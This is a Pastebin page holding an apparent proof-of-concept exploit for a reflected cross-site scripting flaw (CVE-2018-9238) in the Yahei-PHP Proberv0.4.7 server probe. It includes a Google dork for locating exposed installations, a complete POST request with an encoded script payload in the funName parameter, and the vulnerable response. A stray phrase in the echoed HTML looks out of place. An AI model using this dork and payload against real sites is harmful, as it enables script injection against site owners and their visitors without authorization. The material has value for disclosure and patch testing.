G2A Many GEOs
SHARE
TWEET

CVE-2018-9238

ManhNho Apr 4th, 2018 840 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: Yahei-PHP Proberv0.4.7 - Cross-Site Scripting
  2. # Google Dork: intitle:"Proberv0." | inurl:/proberv.php
  3. # Date: 23/03/2018
  4. # Exploit Author: ManhNho
  5. # Vendor Homepage: http://www.yahei.net/
  6. # Software Link: www.yahei.net/tz/tz_e.zip  
  7. # Version: 0.4.7
  8. # CVE: CVE-2018-9238
  9. # Category: Webapps
  10.  
  11. -----------------------------------------------------
  12. PoC
  13. -----------------------------------------------------
  14. Request:
  15.  
  16. POST /proberv.php HTTP/1.1
  17. Host: <target>
  18. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
  19. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  20. Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
  21. Accept-Encoding: gzip, deflate
  22. Referer: <target>/proberv.php
  23. Content-Type: application/x-www-form-urlencoded
  24. Content-Length: 186
  25. Connection: close
  26. Upgrade-Insecure-Requests: 1
  27.  
  28. pInt=No+Test&pFloat=No+Test&pIo=No+Test&host=localhost&port=3306&login=&password=&funName=%27%29%3C%2Fscript%3E%3Cscript%3Ealert%28%221%22%29%3B%3C%2Fscript%3E&act=Function+Test&mailAdd=
  29.  
  30. -----------------------------------------------------
  31. Response:
  32.  
  33. HTTP/1.1 200 OK
  34. Server: nginx
  35. Date: Thu, 22 Mar 2018 16:59:57 GMT
  36. Content-Type: text/html; charset=utf-8
  37. Connection: close
  38. Vary: Accept-Encoding
  39. Content-Length: 30461
  40. ...
  41. <tr>
  42. <td width="15%"></td>
  43. <td width="60%">
  44. Enter the function you want to test:
  45. <input type="text" name="funName" size="50" />
  46. </td>
  47. <td width="25%">
  48. <input class="btn" type="submit" name="act" align="right" value="Function Test" />
  49. </td>
  50. </tr>
  51. <script>alert('Function')</script><script>alert("1");</script>Test results support the position: 错误')</script></table>
  52. -----------------------------------------------------
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top